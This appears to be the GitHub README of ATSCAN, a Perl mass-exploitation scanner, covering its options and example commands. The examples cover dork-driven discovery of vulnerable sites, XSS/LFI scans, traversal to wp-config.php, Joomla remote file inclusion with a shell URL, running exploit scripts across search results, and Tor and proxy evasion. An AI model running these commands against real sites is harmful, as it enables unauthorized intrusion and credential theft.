/ATSCAN

Advanced Search & Dork Mass Exploit - فاحص متقدم لبحث و استغلال الثغرات بالجملة

Primary LanguagePerl

ATSCAN

Advanced Search / Dork / Mass Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent!
Tool: ATSCAN version 11.0
Codename:Anon4t
AUTHOR:Ali MEHDIOUI
GROUP:Alisam Technology
FACE:facebook.com/Forces.des.tempetes.marocaines
YOUTUBE:youtube.com/c/AlisamTechnology
WITTER:twitter.com/AlisamTechno
PLUS:plus.google.com/+AlisamTechnology
Description:

Search engine Google / Bing / Ask / Yandex / Sogou
Mass Dork Search
Multiple instant scans.
Mass Exploitation
Use proxy.
Random user agent.
Random engine.
Extern commands execution.
XSS / SQLI / LFI / AFD scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode & Encode Base64 / MD5
Ports scan.
Extract IPs
Extract E-mails.
Auto detect errors.
Auto detect Cms.
Post data.
Auto sequence repeater.
Validation.
Post and Get method
And more...

Libreries to install:
Perl Requiered.
Works in all platforms.
Download:
git clone https://github.com/AlisamTechnology/ATSCAN
OR direct link: https://github.com/AlisamTechnology/ATSCAN
Permissions:
cd ATSCAN
chmod +x ATSCAN
Installation on Kali Linux:
chmod +x ./install.sh
./install.sh
Execution:
Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Uninstall Tool:
atscan --uninstall
Screenshots:




Help:
--help / -h / -? Help.
--proxy Set tor proxy [Ex: socks://localhost:9050].
User proxy [Ex: http://12.231.54.87:8080 / list.txt].
--random Random all proxy / engine / agent.
--pr Random proxy.
--mr Random engine.
--br Random agent.
--dork/-d dork to search [Ex: house,cars,hotel]
--level/-l Scan level (+- Number of search engine results)
-m Set engine motor [Bing = 1][Google = 2][Ask = 3][Yandex = 4][Sogou = 5][All = all]
--save/-s Output.
-t Target [http://site.com]
-p Set test parameter EX:id,cat,product_ID
--time Set browser time out. default 10s.
--host Domaine name Ex: site.com
--exp Set exploit/payload
--valid/-v Validate by string.
--vpost Validate post data forms by string.
--unique Get urls with exact dork matching
--ifinurl Validate target url by string.
--status Validate by http header status.
--noquery Remove Query string from url. [url like: site.com/index.php?id=]
--replace Exact string to replace
--full --replace --full Will replace all url parametres from string to the end.
--with string to replace with
--xss Xss scan
--lfi local file inclusion
--wp get wordpress sites
--joom Get joomla sites
--joomrfi joomla local file inclusion scan
--shell shell link [Ex: http://www.site.com/shell.txt]
--data Data. See examples
--post Use post method
--get Use get method
--wpafd get wordpress sites with arbitery file download
--admin get site admin page
--shost get site subdomains
--port port
--udp UDP port
--tcp TCP port
--sites sites in the server
--upload get sites with upload files
--zip get sites with zip files
--md5 convert to md5
--encode64 encode base64 string
--decode64 decode base64 string
--email Extract e-mails
--ip Extract IPs.
--regex Crawl to get strings matching regex
--sregex Get only urls with matching regex
rang(x-y) EX: --exp /index.php?id=rang(1-2) --xss will try id=1 then id=2
repeat(string-y) EX: --exp /index.php?id=repeat(../-3)wp-config.php
OR -t site.com/index.php?id=repeat(../-3)wp-config.php
means ../ will be repeated progressively 3 times:
will try id=../wp-config.php then id=../../wp-config.php then id=../../../wp-config.php.
--command External Command
--TARGET Will be replaced by target in extern commands
--HOST Will be replaced by hostname in extern commands
--HOSTIP Will be replaced by target IP in extern commands
--nobanner Hide tool banner
--noinfo Jump extra results info.
--options Show scan configuration.
--beep Produce beep sound if positive scan found
--ifend Produce beep sound when scan process is finished.
--pause Pause scan when first result found.
--update Update.
--uninstall Uninstall Tool.
Examples:
PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] [Ex: http://12.32.1.5:8080] or --proxy [list.txt] [Ex: --proxy /root/Desktop/Documents/my_proxies.txt]
RANDOM:
Random proxy --proxy [proxy list.txt] --pr
Random browser --br
Random engine --mr
Random all --random
SEARCH ENGINE:
Search: atscan --dork [dork> --level [level]
Search: atscan -d [dork> -l [level]
Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork> -l [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1,dork2,dork3> --level [level]
Search and rand: atscan -d [dork> -l [level] --exp "/index.php?id=rang(1-9)" --xss
Get Server sites: atscan -t [ip] --level --sites
Get Server wordpress sites: atscan -t [ip] --level --wp
Get Server joomla sites: atscan -t [ip] --level --joom
Get Server upload sites: atscan -t [ip] --level --upload
Get Server zip sites files: atscan -t [ip] --level --zip
WP Arbitry File Download: atscan -t [ip] --level --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork --level [level] --email
Search + get ips: atscan --dork [dork> --level [level] --ip
REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --xss
atscan -t [target] --exp "/index.php?id=rang(1-10)" --xss
atscan -t [target] --exp "/index.php?id=repeat(../-9)wp-config.php"
PORTS
atscan -t [ip] --port [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"
ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]
DATA:
Post data: atscan -t [target] --data [--post | --get] "field1:value1,field2:value2,field3:value3"
atscan -t [target] --data [--post | --get] "name:userfile,value:file.txt"
Use list: atscan -t [target] --data [--post | --get] "/Desktop/list.txt"
Post + Validation: --data [--post | --get] "name:userfile,value:file.txt" -v [string] / --status [code]
EXTERNAL COMMANDES:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET"
MULTIPLE SCANS:
atscan --dork [dork> --level [10] --xss --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string] --with [string] --exp [payload] [--xss / --lfi / --wp /...]
atscan -t [ip] --level [10] [--xss / --lfi / --wp /...]
atscan -t [target] [--xss / --lfi / --wp /...]
SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
SCAN VALIDATION:
atscan -t atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --xss ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp [payload] --status [code] / --valid [string]
atscan --data [--post | --get] "name:userfile,value:file.txt" -v [string] / --status [code]
atscan -d [dork / dorks.txt] -l [level] [--xss / --shost ..] --status [code] / --valid [string]
UPDATE TOOL:
atscan --update
UNINSTALL TOOL:
atscan --uninstall